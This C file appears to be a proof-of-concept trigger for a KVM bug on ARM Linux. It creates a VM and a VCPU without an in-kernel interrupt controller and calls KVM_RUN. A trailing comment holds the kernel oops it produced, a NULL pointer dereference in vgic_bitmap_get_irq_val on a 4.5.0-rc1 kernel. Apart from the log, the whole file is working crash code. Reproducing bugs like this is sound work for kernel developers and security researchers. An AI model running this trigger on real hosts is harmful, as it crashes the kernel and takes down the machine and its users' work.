#include <assert.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>

#include <linux/kvm.h>
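/*
 * Opens /dev/kvm and verifies that the kernel implements the KVM API version
 * this program was written against.
 *
 * Returns the KVM device descriptor; it is opened O_CLOEXEC so it is not
 * inherited by any child process that execs. Ownership of the descriptor
 * passes to the caller. On any failure a diagnostic is written to stderr and
 * the process exits with EXIT_FAILURE, so a caller never sees -1.
 */
int open_kvm(void) {
    int kvm = open("/dev/kvm", O_RDWR | O_CLOEXEC);
    if (kvm == -1) {
        fprintf(stderr, "Failed to open the KVM device: %s\n", strerror(errno));
        exit(EXIT_FAILURE);
    }

    int version = ioctl(kvm, KVM_GET_API_VERSION, NULL);
    if (version == -1) {
        fprintf(stderr, "Failed to run KVM_GET_API_VERSION: %s\n", strerror(errno));
        exit(EXIT_FAILURE);
    }
    /* The ioctl numbers used below are only meaningful for the stable API
     * version (KVM_API_VERSION == 12); refuse to continue on anything else. */
    if (version != KVM_API_VERSION) {
        fprintf(stderr, "KVM_GET_API_VERSION is %d, not %d\n", version, KVM_API_VERSION);
        exit(EXIT_FAILURE);
    }
    return kvm;
}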
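/* Guest-physical base addresses handed to the in-kernel GICv2 emulation for
 * the distributor and the CPU interface. The values are the ones the original
 * author picked; they are page-aligned and do not overlap. */
enum {
    VGIC_DIST_BASE = 0x10000000,
    VGIC_CPU_BASE  = 0x10001000,
};

/*
 * Registers one VGIC v2 region with the VM.
 *
 * @vmfd  VM file descriptor from KVM_CREATE_VM.
 * @type  KVM_VGIC_V2_ADDR_TYPE_DIST or KVM_VGIC_V2_ADDR_TYPE_CPU.
 * @addr  guest-physical base address of the region.
 * @what  short name used in the error message.
 *
 * Returns 0 on success, -1 if KVM_ARM_SET_DEVICE_ADDR failed (errno is left
 * as set by ioctl and has already been reported on stderr).
 */
static int set_vgic_addr(int vmfd, __u64 type, __u64 addr, const char *what) {
    struct kvm_arm_device_addr dev = {
        .id = type | (KVM_ARM_DEVICE_VGIC_V2 << KVM_ARM_DEVICE_ID_SHIFT),
        .addr = addr,
    };
    if (ioctl(vmfd, KVM_ARM_SET_DEVICE_ADDR, &dev) != 0) {
        fprintf(stderr, "KVM_ARM_SET_DEVICE_ADDR (%s) failed: %d, %s\n",
                what, errno, strerror(errno));
        return -1;
    }
    return 0;
}

/*
 * Creates the in-kernel interrupt controller for @vmfd and places the GICv2
 * distributor and CPU interface at VGIC_DIST_BASE / VGIC_CPU_BASE.
 *
 * Returns 0 on success, -1 on failure with a diagnostic on stderr. Note that
 * nothing in this file undoes KVM_CREATE_IRQCHIP, so after a failure in the
 * address setup the VM is left with an irqchip that has no addresses; callers
 * are expected to abandon the VM rather than retry.
 */
int create_vgic(int vmfd) {
    if (ioctl(vmfd, KVM_CREATE_IRQCHIP, NULL) != 0) {
        fprintf(stderr, "KVM_CREATE_IRQCHIP failed: %d, %s\n", errno, strerror(errno));
        return -1;
    }
    if (set_vgic_addr(vmfd, KVM_VGIC_V2_ADDR_TYPE_DIST, VGIC_DIST_BASE, "distributor") != 0) {
        return -1;
    }
    if (set_vgic_addr(vmfd, KVM_VGIC_V2_ADDR_TYPE_CPU, VGIC_CPU_BASE, "cpu interface") != 0) {
        return -1;
    }
    return 0;
}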
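/* Exits with a diagnostic when an ioctl step failed. Unlike assert() this is
 * not compiled out under NDEBUG, so every step is always checked. */
static void check(int ok, const char *what) {
    if (!ok) {
        fprintf(stderr, "%s failed: %s\n", what, strerror(errno));
        exit(EXIT_FAILURE);
    }
}

/*
 * Creates a VM with a single VCPU initialised to the host's preferred target
 * and runs it once. No guest memory region is registered and the kvm_run
 * structure is never mmap'd, so the exit reason is not inspected: the program
 * only reports whether KVM_RUN returned and, if it failed, why.
 *
 * Returns EXIT_SUCCESS if KVM_RUN returned without error, EXIT_FAILURE
 * otherwise (earlier setup failures exit directly from check()).
 */
int main(int argc, char **argv) {
    (void)argc;
    (void)argv;

    int kvm = open_kvm();

    int vmfd = ioctl(kvm, KVM_CREATE_VM, (unsigned long)0);
    check(vmfd != -1, "KVM_CREATE_VM");

    int vcpufd = ioctl(vmfd, KVM_CREATE_VCPU, (unsigned long)0);
    check(vcpufd != -1, "KVM_CREATE_VCPU");

    /* Ask the host which CPU model it prefers, then initialise the VCPU with
     * exactly what it returned; the features array is not touched here. */
    struct kvm_vcpu_init cpu_init = {0};
    int ret = ioctl(vmfd, KVM_ARM_PREFERRED_TARGET, &cpu_init);
    check(ret == 0, "KVM_ARM_PREFERRED_TARGET");
    ret = ioctl(vcpufd, KVM_ARM_VCPU_INIT, &cpu_init);
    check(ret == 0, "KVM_ARM_VCPU_INIT");

    // No kernel crash if this is enabled
#if 0
    if (create_vgic(vmfd) != 0) {
        exit(EXIT_FAILURE);
    }
#endif

    printf("starting the VM\n");
    ret = ioctl(vcpufd, KVM_RUN, NULL);
    if (ret == -1) {
        fprintf(stderr, "KVM_RUN failed: %s\n", strerror(errno));
    }
    printf("returned\n");

    close(vcpufd);
    close(vmfd);
    close(kvm);
    return ret == -1 ? EXIT_FAILURE : EXIT_SUCCESS;
}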
/* Kernel null pointer dereference:
[ 3969.666334] Unable to handle kernel NULL pointer dereference at virtual address 00000000
[ 3969.674518] pgd = ed6c2800
[ 3969.677226] [00000000] *pgd=6ea55003, *pmd=7f40c003
[ 3969.682286] Internal error: Oops: 207 [#8] SMP ARM
[ 3969.687072] Modules linked in:
[ 3969.690140] CPU: 0 PID: 896 Comm: poc Tainted: G D 4.5.0-rc1 #2
[ 3969.697177] Hardware name: Allwinner sun7i (A20) Family
[ 3969.702396] task: eeb4b9c0 ti: edff6000 task.ti: edff6000
[ 3969.707797] PC is at vgic_bitmap_get_irq_val+0x44/0x54
[ 3969.712930] LR is at kvm_vgic_map_is_active+0x94/0xa4
[ 3969.717976] pc : [<c001d704>] lr : [<c001e908>] psr: 200f0013
sp : edff7e50 ip : 00000180 fp : 00000000
[ 3969.729435] r10: 6d000000 r9 : c06360c0 r8 : ed083000
[ 3969.734652] r7 : 00000001 r6 : ed6c2f50 r5 : ed010000 r4 : ed010000
[ 3969.741169] r3 : 00000000 r2 : 0000001b r1 : 00000000 r0 : 00000000
[ 3969.747689] Flags: nzCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user
[ 3969.754813] Control: 30c5387d Table: 6d6c2800 DAC: fffffffd
[ 3969.760551] Process poc (pid: 896, stack limit = 0xedff6210)
[ 3969.766202] Stack: (0xedff7e50 to 0xedff8000)
[ 3969.770555] 7e40: f5257d14 00000001 00000000 00000000
[ 3969.778724] 7e60: 02e99769 ed010000 c0606230 ed4fcc00 00000001 c0021cf4 ed010000 c0016f60
[ 3969.786892] 7e80: ef7d1ac0 c0602410 00000000 000d0000 00000000 00ff0000 ef7d1a80 c00622f8
[ 3969.795060] 7ea0: c027809c c0067f60 00000004 eeb17400 ec80ea80 b6f0f010 eeb17400 ed010000
[ 3969.803228] 7ec0: 00000000 00000000 eeafcb40 00000000 edff6000 00000000 eec06000 c0011fe8
[ 3969.811396] 7ee0: 00000010 00000010 b6f0f000 00000000 00000000 c00f9af8 eeb4b9c0 edff7fb0
[ 3969.819564] 7f00: eeafcb40 eeafcb40 0000ae80 00000000 eeafcb40 c010a42c ee82e018 ef7d1a80
[ 3969.827732] 7f20: eeb4b9c0 00000000 ee8ed500 ef22f9c0 c0602630 c05fea80 edff7f8c c043f094
[ 3969.835899] 7f40: 00000000 00000002 ed08e848 00000000 00000000 c00fa8b0 00000000 c043f494
[ 3969.844067] 7f60: 00000000 2f1d3000 00000000 eeafcb40 eeafcb40 0000ae80 00000000 00000005
[ 3969.852235] 7f80: edff6000 00000000 00000000 c010aba4 00000000 b6ee7000 000000d8 00000036
[ 3969.860403] 7fa0: c00224e4 c0022340 00000000 b6ee7000 00000005 0000ae80 00000000 00000000
[ 3969.868571] 7fc0: 00000000 b6ee7000 000000d8 00000036 00000000 00000000 b6f13000 00000000
[ 3969.876739] 7fe0: 00020ac0 be8796dc 00010811 b6e8b036 600f0030 00000005 00000000 00000000
[ 3969.884918] [<c001d704>] (vgic_bitmap_get_irq_val) from [<c001e908>] (kvm_vgic_map_is_active+0x94/0xa4)
[ 3969.894307] [<c001e908>] (kvm_vgic_map_is_active) from [<c0021cf4>] (kvm_timer_flush_hwstate+0x60/0x70)
[ 3969.903693] [<c0021cf4>] (kvm_timer_flush_hwstate) from [<c0016f60>] (kvm_arch_vcpu_ioctl_run+0x10c/0x454)
[ 3969.913341] [<c0016f60>] (kvm_arch_vcpu_ioctl_run) from [<c0011fe8>] (kvm_vcpu_ioctl+0x390/0x6e8)
[ 3969.922210] [<c0011fe8>] (kvm_vcpu_ioctl) from [<c010a42c>] (do_vfs_ioctl+0x98/0x7dc)
[ 3969.930036] [<c010a42c>] (do_vfs_ioctl) from [<c010aba4>] (SyS_ioctl+0x34/0x5c)
[ 3969.937339] [<c010aba4>] (SyS_ioctl) from [<c0022340>] (ret_fast_syscall+0x0/0x34)
[ 3969.944901] Code: a1a03002 e202201f e0801101 e1a032c3 (e7910103)
[ 3969.951062] ---[ end trace 4d46a24f1045df69 ]---
*/